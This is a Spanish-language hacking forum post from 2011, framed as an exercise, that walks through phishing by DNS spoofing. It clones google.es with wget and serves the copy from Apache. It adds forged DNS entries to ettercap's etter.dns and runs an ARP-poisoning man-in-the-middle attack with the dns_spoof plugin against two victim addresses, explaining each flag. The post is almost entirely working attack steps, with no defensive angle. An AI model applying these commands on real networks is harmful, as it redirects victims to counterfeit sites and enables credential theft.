elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 17:43  


Tema destacado: Recuperar cuenta de Google, GMail, Youtube

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  Redireccionar el tráfico de una página Web a una pagina falsa - phising		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Redireccionar el tráfico de una página Web a una pagina falsa - phising  (Leído 2,006 veces)
SokarTefnut

Desconectado Desconectado

Mensajes: 60



Ver Perfil
Redireccionar el tráfico de una página Web a una pagina falsa - phising
« en: 22 Marzo 2011, 10:24 »
Para este ejercicio se falseará la página Web de www.google.es.

El primer paso será descargar la página original, para luego modificarla y cuando el equipo víctima intente acceder a www.google.es, la página que le será servida será la que yo he modificado.

Desde el equipo atacante, Linux (Back-Trak 4.2 en este caso), se procede a la descarga de la página original,

para ello utilizaremos wget (Fig. 6-1)

Wget -r -d 3 www.google.es

Las opciones utilizadas son:

-r Para que realiza una descarga recursiva, con lo que intentará descargar el contenido
De cada uno de los enlaces que se encuentren en dicha página y así con cualquier
enlace encontrado, recursivamente.
-d Para fijar la profundidad de la recursividad, solo voy a descargar 3 niveles de
Enlaces en este ejercicio.

Seguidamente consultamos el directorio por defecto para el servidor Web Apache,
mirando el archivo: /etc/apache2/sites-available

Como podemos observar en la imagen 6-2, el directorio por defecto es /var/www/

Modificaremos nuestra falsa página y la ubicaremos en el directorio señalado
anteriormente y lanzamos el servidor Apache.

Modificar el archivo /usr/share/ettercap/etter.dns, para crear las falsas resoluciones DNS que conduzcan a la victima hacia nuestro servidor Apache. (Fig. 6-4)

Añadir nuestras falsas DNS:
*.google.es A 172.30.2.100
*.google.com A 172.30.2.100
(Siendo 172.30.2.100 sea nuestra dirección IP)

Lanzar ataque MITM con falsificación de DNS, para ello utilizamos Ettercap, modo consola: (Fig. 6-5)

ettercap -q -T -M arp -P dns_spoof /172.30.2.129/ /172.30.2.131/ -n
255.255.255.0

-q modo silencioso, no imprime en pantalla los paquetes enviados
-T Usado solo en modo texto
-M Activa ataque MITM
Arp método utilizado en el MITM (arp Poisoning, en este caso)
-P Utilizar un plugging
dns_spoof Éste es el plugin seleccionado
/ip_addres/ Una de las IP para atacar
/ip_addres/ la otra IP
-n <netmask> Usado en caso de cambio de segmento de red,máscara

El resultado del envenenamiento, desde el equipo cliente, al intentar acceder a la página
www.google.es, éste será dirigido hacia la falsificación creada en el equipo atacante.


Aqui está el ejercicio completo con imágenes y en Español:

http://rapidshare.com/files/453789692/Direccionamiento_phising_WEB_SITE.pdf
En línea
"De la teoría a la práctica hay algo que se llama realidad, y ésta sue le transformar los resultados esperados."   Hacking Etico - Carlos Tori
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Redireccionar Una Página Web
Desarrollo Web 		Arkhanion 2 772 Último mensaje 10 Enero 2005, 22:06
por BaD-GirL
Phising con la página principal de Google!!!
Noticias 		mousehack 0 304 Último mensaje 9 Noviembre 2005, 01:27
por mousehack
Redireccionar pagina en Localhost « 1 2 »
Desarrollo Web 		MaLkAvIaN_NeT 21 2,439 Último mensaje 27 Julio 2006, 17:37
por deya
Como redireccionar una página a mi PC ?
GNU/Linux 		Pr0xyH4ck 3 2,077 Último mensaje 31 Julio 2010, 13:14
por Pr0xyH4ck
¿como redireccionar a una pagina falsa y que despues se muestre la original?
Hacking Avanzado 		thefactumest 5 1,083 Último mensaje 5 Enero 2012, 09:41
por adastra
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines